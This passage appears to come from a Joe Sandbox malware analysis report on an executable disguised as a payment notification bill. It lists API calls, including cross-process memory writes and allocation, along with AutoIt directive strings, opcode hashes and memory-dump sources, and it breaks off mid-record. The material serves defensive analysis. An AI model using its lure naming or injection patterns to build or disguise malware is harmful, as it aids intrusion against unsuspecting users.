                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: CloseHandle
                                                                              • String ID:
                                                                              • API String ID: 2962429428-0
                                                                              • Opcode ID: c04de8c8e2adf7f28af8dcea626165b70e5ec8f42d91d86613a8c86b1f5e835a
                                                                              • Instruction ID: 2ceb5a422ff7c3d032fe594fda05a4a2b93cb980ba97cec1c53c83533914205d
                                                                              • Opcode Fuzzy Hash: c04de8c8e2adf7f28af8dcea626165b70e5ec8f42d91d86613a8c86b1f5e835a
                                                                              • Instruction Fuzzy Hash: DC01AE72800B15DFCB30AF66D880812FBF9BFA03163158A3FD19652931C3B1A998DF80
                                                                              APIs
                                                                              • _free.LIBCMT ref: 0091D752
                                                                                • Part of subcall function 009129C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0091D7D1,00000000,00000000,00000000,00000000,?,0091D7F8,00000000,00000007,00000000,?,0091DBF5,00000000), ref: 009129DE
                                                                                • Part of subcall function 009129C8: GetLastError.KERNEL32(00000000,?,0091D7D1,00000000,00000000,00000000,00000000,?,0091D7F8,00000000,00000007,00000000,?,0091DBF5,00000000,00000000), ref: 009129F0
                                                                              • _free.LIBCMT ref: 0091D764
                                                                              • _free.LIBCMT ref: 0091D776
                                                                              • _free.LIBCMT ref: 0091D788
                                                                              • _free.LIBCMT ref: 0091D79A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                              • String ID:
                                                                              • API String ID: 776569668-0
                                                                              • Opcode ID: 57c80ad64519f1f325c331dfd196f2fb1b6b6343fa623c6867d2f3cbde04462c
                                                                              • Instruction ID: f680bdb2b7392eaf05f09c818a31605aacf63cf8a313925b7ecf0395d928e8a8
                                                                              • Opcode Fuzzy Hash: 57c80ad64519f1f325c331dfd196f2fb1b6b6343fa623c6867d2f3cbde04462c
                                                                              • Instruction Fuzzy Hash: 86F04FB271520CAB8625FB6CFAC5D9677DDBF85720B940805F058DB541CB24FCD086A0
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00945C58
                                                                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 00945C6F
                                                                              • MessageBeep.USER32(00000000), ref: 00945C87
                                                                              • KillTimer.USER32(?,0000040A), ref: 00945CA3
                                                                              • EndDialog.USER32(?,00000001), ref: 00945CBD
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                              • String ID:
                                                                              • API String ID: 3741023627-0
                                                                              • Opcode ID: b25c437a7d42f40e2c02104e599d48b265ceb44214b8e76b1cb463dfa4cd0942
                                                                              • Instruction ID: 4b4b32fc6dec7802c8c9f2545416b56f409d9b97f2d527805383b63d1fae3909
                                                                              • Opcode Fuzzy Hash: b25c437a7d42f40e2c02104e599d48b265ceb44214b8e76b1cb463dfa4cd0942
                                                                              • Instruction Fuzzy Hash: 88018171514B04ABEB315B50DDCEFA67BB8BB00B06F01065DA587A10E2DBF4A9849B91
                                                                              APIs
                                                                              • _free.LIBCMT ref: 009122BE
                                                                                • Part of subcall function 009129C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0091D7D1,00000000,00000000,00000000,00000000,?,0091D7F8,00000000,00000007,00000000,?,0091DBF5,00000000), ref: 009129DE
                                                                                • Part of subcall function 009129C8: GetLastError.KERNEL32(00000000,?,0091D7D1,00000000,00000000,00000000,00000000,?,0091D7F8,00000000,00000007,00000000,?,0091DBF5,00000000,00000000), ref: 009129F0
                                                                              • _free.LIBCMT ref: 009122D0
                                                                              • _free.LIBCMT ref: 009122E3
                                                                              • _free.LIBCMT ref: 009122F4
                                                                              • _free.LIBCMT ref: 00912305
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                              • String ID:
                                                                              • API String ID: 776569668-0
                                                                              • Opcode ID: 404891bbf46c184d92088de19240ef68918ab9c5fe3e7624ba6743c37f0335e1
                                                                              • Instruction ID: 68bea41e04053ae7569400429ae437f282db00b8d11a60131578e28380d114b8
                                                                              • Opcode Fuzzy Hash: 404891bbf46c184d92088de19240ef68918ab9c5fe3e7624ba6743c37f0335e1
                                                                              • Instruction Fuzzy Hash: A9F03AB1A282248BC616BF58BE019AD3FA4FB59771740070AF430DA2B1C73548B1BBE4
                                                                              APIs
                                                                              • EndPath.GDI32(?), ref: 008F95D4
                                                                              • StrokeAndFillPath.GDI32(?,?,009371F7,00000000,?,?,?), ref: 008F95F0
                                                                              • SelectObject.GDI32(?,00000000), ref: 008F9603
                                                                              • DeleteObject.GDI32 ref: 008F9616
                                                                              • StrokePath.GDI32(?), ref: 008F9631
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                              • String ID:
                                                                              • API String ID: 2625713937-0
                                                                              • Opcode ID: 3797950b9472eb6d56d34c3a47183b21e495b1d1edeecbcb82e7ab96b0ddc230
                                                                              • Instruction ID: 676f406da0c2c9281bffe247fc9731387b58e432043e1f151bb74756a719bbd0
                                                                              • Opcode Fuzzy Hash: 3797950b9472eb6d56d34c3a47183b21e495b1d1edeecbcb82e7ab96b0ddc230
                                                                              • Instruction Fuzzy Hash: CDF0193102D248EBDB225F65EE287A43B65FB11376F548318F569950F0C7348991EF60
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: __freea$_free
                                                                              • String ID: a/p$am/pm
                                                                              • API String ID: 3432400110-3206640213
                                                                              • Opcode ID: 15ca09828b272925f98998eb687bd8018f88a2ebf4ef50a0a96fd1410ee454a7
                                                                              • Instruction ID: e34787312a8f83ce7f66e36d1297a9aa0abd4b6dd557678a4723a6e4106e3de3
                                                                              • Opcode Fuzzy Hash: 15ca09828b272925f98998eb687bd8018f88a2ebf4ef50a0a96fd1410ee454a7
                                                                              • Instruction Fuzzy Hash: 9CD1E131B0420EFADB289F68C845BFAB7B9EF05300F284559E7219B654D3799DC2CB91
                                                                              APIs
                                                                                • Part of subcall function 00900242: EnterCriticalSection.KERNEL32(009B070C,009B1884,?,?,008F198B,009B2518,?,?,?,008E12F9,00000000), ref: 0090024D
                                                                                • Part of subcall function 00900242: LeaveCriticalSection.KERNEL32(009B070C,?,008F198B,009B2518,?,?,?,008E12F9,00000000), ref: 0090028A
                                                                                • Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD
                                                                                • Part of subcall function 009000A3: __onexit.LIBCMT ref: 009000A9
                                                                              • __Init_thread_footer.LIBCMT ref: 00967BFB
                                                                                • Part of subcall function 009001F8: EnterCriticalSection.KERNEL32(009B070C,?,?,008F8747,009B2514), ref: 00900202
                                                                                • Part of subcall function 009001F8: LeaveCriticalSection.KERNEL32(009B070C,?,008F8747,009B2514), ref: 00900235
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                                              • String ID: 5$G$Variable must be of type 'Object'.
                                                                              • API String ID: 535116098-3733170431
                                                                              • Opcode ID: 984d748d1fb92ce812d1025fcbcf72114789c38f34ca235a0ec87c60f9d1f3ae
                                                                              • Instruction ID: 05daefdea16bbd658461f8a1bf3f753f836e3474a36151c573604fb53ee8a55b
                                                                              • Opcode Fuzzy Hash: 984d748d1fb92ce812d1025fcbcf72114789c38f34ca235a0ec87c60f9d1f3ae
                                                                              • Instruction Fuzzy Hash: A491AC70A04208EFCB14EF98C991DBDB7B5FF89308F108459F8469B292DB75AE41CB51
                                                                              APIs
                                                                                • Part of subcall function 0094B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,009421D0,?,?,00000034,00000800,?,00000034), ref: 0094B42D
                                                                              • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00942760
                                                                                • Part of subcall function 0094B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,009421FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0094B3F8
                                                                                • Part of subcall function 0094B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0094B355
                                                                                • Part of subcall function 0094B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00942194,00000034,?,?,00001004,00000000,00000000), ref: 0094B365
                                                                                • Part of subcall function 0094B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00942194,00000034,?,?,00001004,00000000,00000000), ref: 0094B37B
                                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 009427CD
                                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0094281A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                              • String ID: @
                                                                              • API String ID: 4150878124-2766056989
                                                                              • Opcode ID: 3e1503ba381c506eb713d236356bcff0746655636dc43d6b4a0320812ddc6d61
                                                                              • Instruction ID: e6e7ab810fcea78c653cb92e05509a8e269e3452d550b5b290b59aa38b24d868
                                                                              • Opcode Fuzzy Hash: 3e1503ba381c506eb713d236356bcff0746655636dc43d6b4a0320812ddc6d61
                                                                              • Instruction Fuzzy Hash: EF410C72901218AEDB10DFA4C985FEEBBB8AF45700F104099FA55B7191DB70AE85CB61
                                                                              APIs
                                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe,00000104), ref: 00911769
                                                                              • _free.LIBCMT ref: 00911834
                                                                              • _free.LIBCMT ref: 0091183E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: _free$FileModuleName
                                                                              • String ID: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe
                                                                              • API String ID: 2506810119-1769530631
                                                                              • Opcode ID: 4eb249cbb6f88367414cb571223020698da193d01848f0fe34ea41711dff6a37
                                                                              • Instruction ID: 3df2ea220abb2945e825f007b7815390c7665d701efedd2ca5b58a51819e7361
                                                                              • Opcode Fuzzy Hash: 4eb249cbb6f88367414cb571223020698da193d01848f0fe34ea41711dff6a37
                                                                              • Instruction Fuzzy Hash: AA318E71B0421CBFDB21DF999981EDEBBFCEB85320B5041A6F91497251D6708E80DB90
                                                                              APIs
                                                                              • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0094C306
                                                                              • DeleteMenu.USER32(?,00000007,00000000), ref: 0094C34C
                                                                              • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,009B1990,01997190), ref: 0094C395
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$Delete$InfoItem
                                                                              • String ID: 0
                                                                              • API String ID: 135850232-4108050209
                                                                              • Opcode ID: 5927d0474dcb6b95bb4fe496040508c4c4d5485e5f6f0b7c7c3bd3fc4f8c552f
                                                                              • Instruction ID: 24b1ffb55821fd2237094797f486913d7ddd482b1fb6df4cfa4ce9587f82889f
                                                                              • Opcode Fuzzy Hash: 5927d0474dcb6b95bb4fe496040508c4c4d5485e5f6f0b7c7c3bd3fc4f8c552f
                                                                              • Instruction Fuzzy Hash: 0741C3B22093019FD720DF25D844F1ABBE8EF85711F008A1DF9A5972D1D770E904CB62
                                                                              APIs
                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0097CC08,00000000,?,?,?,?), ref: 009744AA
                                                                              • GetWindowLongW.USER32 ref: 009744C7
                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 009744D7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Long
                                                                              • String ID: SysTreeView32
                                                                              • API String ID: 847901565-1698111956
                                                                              • Opcode ID: df5f5b4666d1d4a68a3329a2074314080f2db72e0f152c967e7bf7a00478dcb0
                                                                              • Instruction ID: 08d2b3f34708a84ba2e9513359b158b8be7ab94b61b10f0c2b8e3194061db798
                                                                              • Opcode Fuzzy Hash: df5f5b4666d1d4a68a3329a2074314080f2db72e0f152c967e7bf7a00478dcb0
                                                                              • Instruction Fuzzy Hash: EF318F72214605AFDF218E38DC45BEA77A9EB49334F208715F979D21E1DB70EC90AB50
                                                                              APIs
                                                                                • Part of subcall function 0096335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00963077,?,?), ref: 00963378
                                                                              • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0096307A
                                                                              • _wcslen.LIBCMT ref: 0096309B
                                                                              • htons.WSOCK32(00000000,?,?,00000000), ref: 00963106
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                              • String ID: 255.255.255.255
                                                                              • API String ID: 946324512-2422070025
                                                                              • Opcode ID: ccf7c189b4a9d92af62d3caba4f18cc0561bb1fc336810f576e5841cd5384eff
                                                                              • Instruction ID: c7a38d3f974b15b4f72775757170495dd8a8833e9aa3258da27ffd11a14ac71b
                                                                              • Opcode Fuzzy Hash: ccf7c189b4a9d92af62d3caba4f18cc0561bb1fc336810f576e5841cd5384eff
                                                                              • Instruction Fuzzy Hash: 0F3104352042019FCB20CF28C485EAA77E4EF55318F25C059E9158F392CB72EF85C761
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00973F40
                                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00973F54
                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00973F78
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Window
                                                                              • String ID: SysMonthCal32
                                                                              • API String ID: 2326795674-1439706946
                                                                              • Opcode ID: d4d6c26b171c1da44e53fb54db22b288bdcf03247ec36cee92aa8f5b3aff9dbc
                                                                              • Instruction ID: 6e8f9a6c27e5343160ca477f9ad74ef4ffab9c40f1424ff2cb734bb0d5823f0a
                                                                              • Opcode Fuzzy Hash: d4d6c26b171c1da44e53fb54db22b288bdcf03247ec36cee92aa8f5b3aff9dbc
                                                                              • Instruction Fuzzy Hash: DF21BF33610219BFEF118F50CC46FEA3B79EF88754F114214FA19AB1D0D6B1A8909B90
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00974705
                                                                              • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00974713
                                                                              • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0097471A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$DestroyWindow
                                                                              • String ID: msctls_updown32
                                                                              • API String ID: 4014797782-2298589950
                                                                              • Opcode ID: bed3365a7e529818688dc13c7a4419e00eeb9da0bbf7e6453ef26212a68ae325
                                                                              • Instruction ID: 43f29ceb5d918ee2193e684f15ed106b3541d3395f517db4070885c54efdb04b
                                                                              • Opcode Fuzzy Hash: bed3365a7e529818688dc13c7a4419e00eeb9da0bbf7e6453ef26212a68ae325
                                                                              • Instruction Fuzzy Hash: 7121A1B6604209AFDB14DF68DCD1DB737ADEF8A7A8B004149FA049B251CB30EC11DB60
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: _wcslen
                                                                              • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                              • API String ID: 176396367-2734436370
                                                                              • Opcode ID: f0a810c551f3e17cff52239dd69723fac37a21bdb4b4e4993124cb5cd042a5c0
                                                                              • Instruction ID: 86ae42afa664ef09d8a97a2c44420ca9eea450817f9a8cf6f0a66cbe774958f7
                                                                              • Opcode Fuzzy Hash: f0a810c551f3e17cff52239dd69723fac37a21bdb4b4e4993124cb5cd042a5c0
                                                                              • Instruction Fuzzy Hash: 612157722142506AC335BB29EC16FBB73DCEFA1324F10842AFD49DB081EB55AD81C295
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00973840
                                                                              • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00973850
                                                                              • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00973876
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$MoveWindow
                                                                              • String ID: Listbox
